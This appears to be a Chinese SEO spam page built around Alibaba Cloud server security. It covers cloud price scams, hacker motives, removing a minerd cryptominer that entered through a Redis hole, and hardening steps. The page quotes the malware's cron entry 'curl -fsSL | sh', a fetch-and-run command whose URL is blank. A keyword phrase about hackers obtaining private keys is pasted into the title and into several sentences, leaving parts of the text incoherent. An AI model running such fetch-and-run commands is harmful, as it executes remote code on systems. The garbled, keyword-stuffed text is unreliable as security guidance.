包含黑客推广阿里云获取私钥的词条

导航：

• 1、阿里云服务器的云式骗局为什么能骗那么多人？
• 2、黑客攻击阿里云服务器的目的
• 3、阿里云服务器被挖矿了怎么办？(纯纯电脑小白
• 4、阿里云服务器刚买两天就被攻击当肉鸡，黑客怎么做到的

阿里云服务器的云式骗局为什么能骗那么多人？

上钩的 基本都是 行业新手，只能看到眼前的低价甚至是免费……不懂里面的套路，不懂里面的道道……

人家品牌影响力在那儿放着的，这是没什么好办法的事情；只能是多宣传 多引导，让行业新手多更多的了解相关知识，

让他们不只看到眼前的低价和免费

黑客攻击阿里云服务器的目的

黑客攻击服务器无外乎为了钱黑客推广阿里云获取私钥，一但关机对其造成了影响，势必造成客户对阿里云黑客推广阿里云获取私钥的信任问题，造成客户流失。

同行的话，目的已经达成，如果纯粹的黑客就是为了体现自己的技术，或者为了勒索阿里云。

阿里云服务器被挖矿了怎么办？(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL | sh

病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

阿里云服务器刚买两天就被攻击当肉鸡，黑客怎么做到的

您这服务器是被黑客入侵了，被黑的因素 一般都是程序留了后门或vps内被留了系统内核级别的木马 或网站的代码留了隐蔽性的木马或一句话shell

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了

服务器被黑是每个网站管理员最头痛的问题 也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业.